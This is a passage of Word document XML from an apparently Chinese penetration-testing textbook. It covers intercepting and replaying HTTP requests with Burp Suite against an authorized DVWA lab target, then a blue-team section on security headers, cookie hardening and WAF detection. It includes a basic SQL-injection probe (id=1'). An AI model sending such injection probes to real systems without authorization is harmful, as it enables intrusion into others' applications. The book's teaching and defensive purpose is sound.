        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">生成的证书导出为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> P12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">格式再导入，或检查操作系统的代理设置是否干扰浏览器直连代理。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">部分应用请求不经过代理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：某些应用可能硬编码不使用系统代理，此时可考虑系统级别的透明代理或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VPN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">方案，但已超出本书基础范围。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="151"/>
    <w:bookmarkStart w:id="152" w:name="拦截修改并重放请求"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1.3.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">拦截、修改并重放请求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">目标场景（占位）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：假设有授权靶机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">运行在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（实际值因环境而异），登录后访问</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入模块，URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">形如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://&lt;TARGET_IP&gt;/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。我们演示拦截该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求，修改参数值后重放，观察返回差异。此为教学示例，后续章节中对真实漏洞点会重复此工作流。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">操作步骤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中确保</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Proxy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Intercept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">按钮显示“Intercept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">on”（按钮文字为淡橙/灰色背景，表示截停状态）。如果当前是“Intercept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">off”，点击该按钮切换。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在浏览器中访问目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">URL。浏览器会一直处于加载状态，因为请求已被</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">截停。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">切换到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Intercept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标签中会显示原始</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求（Raw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">视图）。首行类似：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit HTTP/1.1  Host: &lt;TARGET_IP&gt;  ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Raw </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">视图中直接修改参数。例如将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">改为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id=2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或测试</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id=1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。注意保持请求格式合法。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">点击</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Forward</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">按钮，Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将修改后的请求发送至服务器，服务器返回的响应会进入浏览器的正常流程。此时可在浏览器中观察页面变化。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（可选）如需反复修改重放，可右键点击已截停的请求，选择</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Send to Repeater</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，然后</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Cancel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">掉当前截停（或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Drop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），切换到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Repeater</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标签。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Repeater </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中可任意修改请求内容并多次点击</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Send</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，每次都能查看完整响应，且不受浏览器渲染影响。Repeater</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的“Go”按钮是后续手工漏洞验证的核心操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">原始请求</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">返回正常用户数据。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">修改为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id=2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">返回另一个用户的数据（或空结果），证实在服务端参数被解释。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">修改为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id=1'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可能触发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">错误，显示数据库错误回显（取决于靶机级别与错误报告设置）。此举不是最终攻击，仅验证参数是否被注入。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Repeater </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中可逐次修改、对比响应长度与内容，做出推断。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="152"/>
    <w:bookmarkEnd w:id="153"/>
    <w:bookmarkStart w:id="154" w:name="防御对照框http-安全头与代理检测"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框：HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全头与代理检测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">（蓝队）检测</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">审查响应头</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：定期对目标应用执行自动化扫描（如使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nikto、OWASP ZAP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的被动扫描）以及手动审查，确保每个页面均返回预期的安全头（CSP、HSTS、X-Content-Type-Options、X-Frame-Options）。缺失的项应记录并纳入修复计划。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">审计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：检查会话</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是否包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite=Lax/Strict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属性。使用浏览器开发者工具或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Set-Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头。任何缺失都是中高风险发现。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">代理异常检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：生产网络中应监控未授权的代理流量或异常</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">证书安装行为。但企业内部授权的渗透测试使用的代理流量应与攻击行为有明确区分。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">WAF/IPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">特征</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">拦截和篡改行为本身在流量层面不会留下独特指纹，但持续从单一</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发出的高频修改请求、不同</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的逐步试探，可通过请求速率、异常参数组合等特征被</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则检测（例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">技术</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1071.001 Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Protocols）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">（蓝队）修复</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">安全头部署</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器或应用层统一配置安全响应头。例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Apache/Nginx </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">add_header</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指令添加，或在应用框架中间件中设置。CSP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">优先采用报告模式（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Security-Policy-Report-Only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）测试，逐步收紧为强制执行。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">安全加固</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在应用配置中将所有会话</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">默认设为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure; HttpOnly; SameSite=Lax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
